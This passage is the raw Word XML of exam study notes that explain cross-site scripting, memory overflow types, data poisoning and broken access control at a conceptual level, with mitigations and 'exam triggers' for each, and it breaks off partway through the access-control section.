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D150" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3609A45C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Cross-site scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF31D0A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADC446" w14:textId="088BBCBA" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Attacker injects malicious script (usually JavaScript) into a web </w:t>
      </w:r>
      <w:r w:rsidR="00972170">
        <w:t>page,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so it runs in the victim’s browser, in the context of a trusted site. Goal: steal cookies/tokens, perform actions as the user, deface UI, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644FA1BF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFD00F0" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>a. Reflected XSS (Non-persistent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E19EE3F" w14:textId="77777777" w:rsidR="00E0685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What happens</w:t>
      </w:r>
      <w:r>
        <w:t>: Malicious payload is reflected immediately in the HTTP response (often via URL or form submission). It’s not stored on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D5D8C7" w14:textId="77777777" w:rsidR="00E0685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Pattern</w:t>
      </w:r>
      <w:r>
        <w:t>: User clicks a specially crafted link or submits a form → server echoes unvalidated input directly into the page → script executes in user’s browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEA27BA" w14:textId="77777777" w:rsidR="00E0685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Key traits</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B02F7D1" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>One-off attack per click.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE9E053" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Payload in URL, query string, or form data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464F89FF" w14:textId="77777777" w:rsidR="00E0685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Mitigations</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746DDE2A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Input validation and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>output encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (context-aware).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0EBFE" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use security headers (e.g., Content-Security-Policy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A3720" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use modern frameworks / templating that auto-encode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541CE40" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>b. Persistent (Stored) XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18921809" w14:textId="77777777" w:rsidR="00E0685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What happens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Malicious script is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stored</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by the app (e.g., in DB, comments, profile fields). Every user who views that content executes the script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B0E03F" w14:textId="77777777" w:rsidR="00E0685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Pattern</w:t>
      </w:r>
      <w:r>
        <w:t>: Attacker posts malicious script into a comment/forum/profile → server stores it → other users viewing the page are hit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17979599" w14:textId="77777777" w:rsidR="00E0685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Key traits</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D52D7B7" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Impacts multiple users over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2A45BF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Often in forums, message boards, user profiles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2880E" w14:textId="77777777" w:rsidR="00E0685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Mitigations</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA487E" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Strict input validation and output encoding for stored content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EBE796" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sanitize rich-text / HTML input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2028DB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use CSP to limit JS sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECC185A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (XSS)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CEF06A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>JavaScript or &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lt;script&amp;gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; in user-controlled fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE9E36F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Questions mentioning “runs in victim’s browser in context of trusted site.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6D365" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For mitigations: choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>input validation + output encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sanitizing user input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (not “encryption” or just “firewalls”).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A89AC4" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43461936" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Overflow vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7341F572" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">All overflow types are about putting too much data into a field/variable, corrupting memory and potentially allowing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arbitrary code execution</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44720588" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>a. Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B1AA1" w14:textId="77777777" w:rsidR="00E0685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What it is</w:t>
      </w:r>
      <w:r>
        <w:t>: More data is written into a memory buffer than it can hold; data spills into adjacent memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4985BB" w14:textId="77777777" w:rsidR="00E0685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>Effects</w:t>
      </w:r>
      <w:r>
        <w:t>: Crash, or overwrite control data (like return address) → run attacker’s shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589C1858" w14:textId="77777777" w:rsidR="00E0685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Mitigations</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775ED7C2" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bounds checking, safe string functions, modern languages (Java, C#).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C882DFB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Compiler protections: stack canaries, ASLR, DEP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F58BD70" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Fuzz testing and secure coding reviews.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6867EC" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>b. Integer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4267BAB3" w14:textId="77777777" w:rsidR="00E0685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What it is</w:t>
      </w:r>
      <w:r>
        <w:t>: Arithmetic on integer types leads to wrap-around or truncation; resulting value used as size or index creates a buffer overflow or logic bug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2072496F" w14:textId="77777777" w:rsidR="00E0685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Mitigations</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B77EA15" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use safe integer libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C21C4" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check ranges before arithmetic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43881287" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Static analysis tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B92F8" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>c. Heap Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46820A56" w14:textId="77777777" w:rsidR="00E0685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What it is</w:t>
      </w:r>
      <w:r>
        <w:t>: Overflow in dynamically allocated memory (heap). Overwrites heap structures/objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D361B5" w14:textId="77777777" w:rsidR="00E0685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Effects</w:t>
      </w:r>
      <w:r>
        <w:t>: Modify function pointers/objects to redirect execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195815C7" w14:textId="77777777" w:rsidR="00E0685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Mitigations</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63482F89" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Same as buffer overflow plus hardened heap allocators and safe memory APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6354761B" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>d. Stack Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43D3C2" w14:textId="77777777" w:rsidR="00E0685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What it is</w:t>
      </w:r>
      <w:r>
        <w:t>: Overflow in stack memory (e.g., function local variables). Classic stack-based buffer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571F8D2C" w14:textId="77777777" w:rsidR="00E0685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Effects</w:t>
      </w:r>
      <w:r>
        <w:t>: Overwrite return address; attacker gains a shell or executes arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077A6B3" w14:textId="77777777" w:rsidR="00E0685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Mitigations</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39431970" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stack canaries, NX (no-execute) stack, ASLR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33B3A1" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avoid dangerous functions (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, gets), validate input lengths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007F0E72" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (overflow)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2559CE8F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Terms like “buffer overflow,” “stack overflow,” “heap overflow,” “integer wraps around,” “exceeds buffer size,” “arbitrary code execution.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0155FEB3" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For mitigations: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bounds checking, input validation, safe libraries, ASLR, stack canaries, DEP</w:t>
      </w:r>
      <w:r>
        <w:t>, fuzzing, static analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B18C13A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB9A600" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Data poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022261D" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D17C0" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Attacker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrupts the data that a system depends on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (often ML models, databases, or logs) so its decisions or analytics become wrong or biased.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C250C46" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5454A601" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Poisoning training data for a machine learning model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7166A1" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Modifying IDS signatures or blacklists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B0866" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFE300F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Validate and sanitize inbound data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8684CA" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Restrict who/what can update training or reference data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A13550" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use integrity checksums/hashes, versioning, and access control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8728B0" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Monitor anomalies in model behavior/output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1D121" w14:textId="77777777" w:rsidR="000F7397" w:rsidRDefault="000F7397">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3530ADB2" w14:textId="3579AAFF" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exam triggers (data poisoning)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278463A0" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“Tainted training data,” “compromised ML model,” “analytics giving manipulated predictions,” “manipulated blacklists/whitelists”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEEC26D" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mitigation answers should mention </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data validation, access control to training data, integrity checks</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA58626" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F181C45" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Broken access control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B01734F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B17B6F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">App fails to enforce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>who is allowed to do what</w:t>
      </w:r>
      <w:r>
        <w:t>. Users can access functions or data beyond their role (e.g., change another user’s record).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D93414" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AFCC8A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IDOR: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=123 changed to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=124 and it works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46ABEB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Normal user calling admin-only endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E0B6C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Typical symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F48F8CB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Escalation without proper checks.</w:t>
      </w:r>
    </w:p>
